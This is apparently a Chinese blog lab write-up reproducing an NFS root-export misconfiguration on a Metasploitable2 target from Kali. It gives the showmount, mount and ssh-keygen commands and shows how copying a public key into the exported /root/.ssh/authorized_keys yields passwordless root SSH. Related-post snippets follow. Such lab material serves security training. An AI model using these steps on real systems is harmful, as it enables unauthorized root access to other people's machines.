Linux NFS共享目录配置漏洞

于 2024-05-11 12:11:25 发布
阅读量416 收藏 11
点赞数 3
分类专栏: Web安全进阶 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62670778/article/details/138685769
版权

Linux NFS共享目录配置漏洞

一、实验目的

  • 利用 NFS共享目录配置漏洞读取目标主机的 /etc/passwd 文件内容
  • NFS 服务配置漏洞,赋予了根目录远程可写权限,导致 /root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登陆

二、实验原理

  • NFS,用于在网络上共享文件系统的分布式文件系统协议,是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送
  • NFS服务配置漏洞赋予了根目录远程可写权限,导致 /root/.ssh/authorized_keys 可被修改,实现远程ssh无密码登录
  • 影响系统/软件:
    • 所有Linux系统的NFS服务

三、复现准备

  1. 靶机:Metasplotable2-Linux - 192.168.9.147
  2. 攻击机:Kali - 192.168.9.148

四、漏洞复现

4.1、复现前提

  1. 使用nmap扫描靶机的IP地址,可以看到靶机的2049端口开放,且使用了nfs服务
    在这里插入图片描述

  2. 尝试查看靶机利用NFS共享的全部文件夹:看到结果是 / * 这表示将根目录下单全部文件都共享了

showmount -e 192.168.9.147

在这里插入图片描述

  1. 在攻击机上面创建一个根文件夹 /temp1/,其目的就是映射共享文件夹下的根目录
    在这里插入图片描述

  2. 将靶机上的共享文件挂载到该文件上面

mount -t nfs 192.168.9.147:/ /temp1 -o nolock

在这里插入图片描述

  1. 在挂载成功之后我们可以通过 df-h 命令查看所有的本地磁盘的信息
    在这里插入图片描述

  2. 输入cd /temp1 可以进入该文件夹
    在这里插入图片描述

  3. 输入 ls -al 可以查看所有的文件
    在这里插入图片描述

  4. 我们尝试用ssh服务连接上靶机

    • 输入命令 ssh root@192.168.9.147
    • 发现需要输入密码,但是我们是不知道密码的

  5. 接下来可以利用nfs漏洞实现远程ssh无密码登录

4.2、正式复现

  1. 生成一组公私钥:ssh-keygen

    • 公私钥存放的地址 /root/.ssh/id_rsa
      在这里插入图片描述
      在这里插入图片描述

  2. 将公钥传输给靶机

cp /root/.ssh/id_rsa.pub /temp1/root/.ssh/authorized_keys

在这里插入图片描述

  1. 传输成功之后再次尝试使用ssh命令连接靶机
    在这里插入图片描述

  2. 成功
    在这里插入图片描述

月亮今天也很亮
关注
  • 3
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
nfs漏洞分析
qq_57147160的博客
12-13 1364
首先nfs是一个文件共享的一个服务,然后来进行搭建一下,首先启动起来: 这样服务已将开启了,但是还没有共享目录文件,我们需要再/etc/exports中来进行配置; 写上这一句话,*号的意思是所以ip都可以进行访问,rw就是可以写入的意思。 随后我们使用nmap进行扫描: 就可以看到nfs服务了。 我们使用showmount命令来进行查看可以访问的路径: 就可以可能到我们可以访问根目录。 随后我们使用命令mount来挂载一个镜像: 挂载完成后,我们进入/mnt目录就可以
Linuxnfs配置
03-07
详细的介绍了如何在Linux配置NFS,实现Linux下的网络文件
NFS未授权访问
limb0的博客
11-20 8220
NFS未授权访问 一、漏洞介绍 NFS(Network File System)即网络文件系统,它允许网络中的计算机之间通过TCP/IP网络共享资源。在NFS的应用中,本地NFS的客户端应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。若运维人员未对文件访问进行控制,将导致本地文件可被任意读取。 二、漏洞危害 本地文件可被任意读取。 三、漏洞验证 首先执行showmount试试...
NSF未授权访问漏洞/共享文件目录数据信息泄露
weixin_38896449的博客
02-24 5607
NSF未授权访问漏洞1、漏洞描述2、漏洞检测3、漏洞利用/验证4、漏洞修复 1、漏洞描述 Network File System(NFS),网络文件系统,是由SUN公司研制的UNIX表示层协议(presentation layer protocol),能使使用者访问网络上别处的文件就像在使用自己的计算机一样。nfs最初只支持UDP协议,在新版本中支持TCP和UDP协议,默认监听端口为2049。 2、漏洞检测 (1)使用nmap,执行命令nmap --script nfs-showmount IP,获取到
Linux共享服务的漏洞,Linux NFS共享目录配置漏洞
weixin_39874196的博客
05-03 604
目的:利用 NFS共享目录配置漏洞读取目标主机的/etc/passwd文件内容原理:NFS服务配置漏洞赋予了根目录远程可写权限,导致/root/.ssh/authorized_keys可被修改,实现远程ssh无密码登录。准备:Kali系统版本2.0主机IP:192.168.1.2 靶机IP:192.168.1.3实战:Step1:查看目标主机上NFS服务是否开启:在终端输入rpcinfo -p...
Linux NFS共享目录配置漏洞实现免密登陆
最新发布
NatusVincere
04-02 385
ssh连接靶机,输入刚才设置的秘钥,输入完成后回车,再输入yes,再按下回车即可连接成功。输入showmount -e 192.168.211.141查看共享目录。输入命令rpcinfo 192.168.211.141进行探测。输入命令挂载靶机目录,挂载位置为自己设置的文件夹。设置一个ssh秘钥,输入完命令后按几下回车即可。注意:文件夹需要存在,可以自己先创建一个文件夹。输入命令将公钥复制到目标靶机固定位置。注意:记得输入yes,否则会连接失败。输入ls查看是否挂载成功。
NFS不安全的配置漏洞
weixin_46564680的博客
10-13 2115
NFS不安全的配置漏洞 NFS简述: 网络文件系统(英语:Network File System,缩写作 NFS)是一种分布式文件系统,力求客户端主机可以访问服务器端文件,并且其过程与访问本地存储时一样,允许网络上的用户以类似于本地存储的方式访问共享文件夹。 NFS服务的默认开放端口为2049/TCP。 漏洞检测: NFS不安全配置漏洞检测可以通过漏洞扫描工具发现 Nessus漏洞报告详情 使用NMAP检测漏洞 使用NMAP扫描发现目标开放2049端口 查看nmap自带的和NFS相关的
linux系统设置NFS共享目录
06-27
linux系统设置NFS共享目录,已经测试过了,可以使用,服务端要先安装nfs服务
linux nfs共享目录搭建
12-07
在centos6.4下搭建nfs共享目录
Linux系统NFS服务器配置方法
11-10
则开启服务(默认服务下nfs没有完全开启) 命令#service nfs start #service portmap start 四、指定NFS服务器配置文件 NFS服务器配置文件保存“/etc/”目录中,文件名称是“exports”,该文件用于被
Linux NFS服务器安装与配置思路分析
09-15
NFS 是Network File System的缩写,即网络文件系统,可以让不同的客户端挂载使用同一个目录,作为共享存储使用,这样可以保证不同的节点客户端数据一致性,在集群架构中经常用到.这篇文章主要介绍了Linux NFS服务器...
Linux NFS服务器的安装与配置
02-19
Linux NFS服务器的安装与配置,共享NAS,文件服务器,专业的文档
LinuxNFS服务的配置
08-11
LinuxNFS服务的配置
nfs文件共享漏洞
m0_52433710的博客
12-21 5644
什么是nfs NFS是基于UDP/IP协议的应用,其实现主要是采用远程过程调用RPC机制,RPC提供了一组与机器、操作系统以及低层传送协议无关的存取远程文件的操作。RPC采用了XDR的支持。XDR是一种与机器无关的数据描述编码的协议,他以独立与任意机器体系结构的格式对网上传送的数据进行编码和解码,支持在异构系统之间数据的传送。 漏洞复现 攻击机:Kali 靶机:Metasploitable2 首先利用nmap对靶机 进行扫描,扫描其开放的端口: ...
漏洞验证】NFS 共享信息泄露漏洞
热门推荐
weixin_43486390的博客
01-15 1万+
文章目录描述验证 描述 漏洞名称:NFS Exported Share Information Disclosure 中文名称:NFS 共享信息泄露漏洞 漏洞等级:高危 CVE:CVE-1999-0170 Nessus扫描结果: 输出共享目录和文件信息: 验证 步骤1:msf 验证漏洞是否存在,并输出共享目录 use auxiliary/scanner/nfs/nfsmount set rho...
nfs漏洞修复(showmount -e)
kali_yao的博客
12-18 8711
注:nfs是生产不太建议用,如果要用的话不要对外;但如果真要对外用的话也可修复漏洞 1.漏洞概述 可以对目标主机进行"showmount -e"操作,此操作将泄露目标主机大量敏感信息,比如目录结构。更糟糕的是,如果访问控制不严的话,攻击者有可能直接访问到目标主机上的数据。 允许指定主机通过mount到nfs服务器上,阻止其他主机通过showmount -e方式,泄露NFS共享目录结构信息 2、先查看你nfs配置 ~]# cat /etc/exports /ceshi 172.17.0.1
Linux nfs共享目录挂载
07-28
你可以使用以下步骤将Linux上的NFS共享目录挂载到本地: 1. 首先,确保你已经安装了NFS客户端软件。在大多数Linux发行版中,你可以使用以下命令来安装: ``` sudo apt-get install nfs-common # Ubuntu/Debian sudo yum install nfs-utils # CentOS/RHEL ``` 2. 创建一个本地目录,用于挂载NFS共享目录。例如,创建一个名为`/mnt/nfs`的目录: ``` sudo mkdir -p /mnt/nfs ``` 3. 使用`mount`命令来挂载NFS共享目录。以下是基本的挂载命令格式: ``` sudo mount -t nfs <NFS服务器IP地址或主机名>:<共享目录路径> <本地挂载路径> ``` 例如,如果NFS服务器的IP地址是`192.168.1.100`,共享目录路径是`/data`,你可以运行以下命令来挂载: ``` sudo mount -t nfs 192.168.1.100:/data /mnt/nfs ``` 4. 挂载完成后,你可以通过在`/mnt/nfs`目录下查看文件来访问NFS共享目录的内容: ``` ls /mnt/nfs ``` 请注意,如果你想在每次启动时自动挂载NFS共享目录,你可以将相应的挂载命令添加到`/etc/fstab`文件中。这样,在系统启动时,会自动执行挂载操作。 希望这些步骤能帮助你成功挂载NFS共享目录!如有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值